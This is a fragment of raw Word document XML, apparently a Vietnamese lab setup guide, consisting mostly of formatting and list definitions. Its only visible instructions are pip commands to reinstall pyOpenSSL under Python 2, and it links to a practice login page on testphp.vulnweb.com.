          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5218251C" wp14:editId="1C8FBC12">
            <wp:extent cx="5733415" cy="5339715"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="16" name="Picture 16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screenshot of a computer program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533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08CF1" w14:textId="2DB15690" w:rsidR="004B5999" w:rsidRDefault="004B5999" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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(Có thể bỏ qua)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C456F" w14:textId="03158C35" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ Thực hiện 2 lệnh sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF7B79" w14:textId="09C4EDCC" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440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</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 -m pip uninstall pyOpenSSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E353CB" w14:textId="3FE08F88" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440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   </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 -m pip install pyOpenSSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C30B53F" w14:textId="77777777" w:rsidR="002C1F0D" w:rsidRPr="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002C1F0D" w:rsidRPr="002C1F0D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312E02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0F68F7E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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3D164F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16F89A26"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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4C87FB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4E06BA8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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1CC3099E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55EEE2AA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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25E31F69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C3E7B12"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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30880B26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D534D1F0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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36F354C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C002C034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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E7378EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E4E3A1E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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40EA1C07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9B0BD94"/>
    <w:lvl w:ilvl="0" w:tplc="C854E634">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="504" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Times New Roman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2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64" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="447801E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBEA367E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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44E2642E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCC0EF60"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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4F0708B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3620B56"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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5FF04628"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B78966E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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7A1C677F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A106D3DE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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7ED634B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="910849D6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+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6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15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A595F"/>
    <w:rsid w:val="002C1F0D"/>
    <w:rsid w:val="004A595F"/>
    <w:rsid w:val="004B5999"/>
    <w:rsid w:val="00762E17"/>
    <w:rsid w:val="00FB08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17BE71"/>
  <w15:docId w15:val="{079204ED-8540-426C-AF60-4DEE2B5797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-GB" w:eastAsia="ja-JP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00FB08B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62E17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62E1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hyperlink" Target="http://testphp.vulnweb.com/login.php" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bootstrap.pypa.io/pip/2.7/get-pip.py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9</Pages>
  <Words>403</Words>
  <Characters>2298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Nguyen Quoc Vuong</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-06T12:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-06T12:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>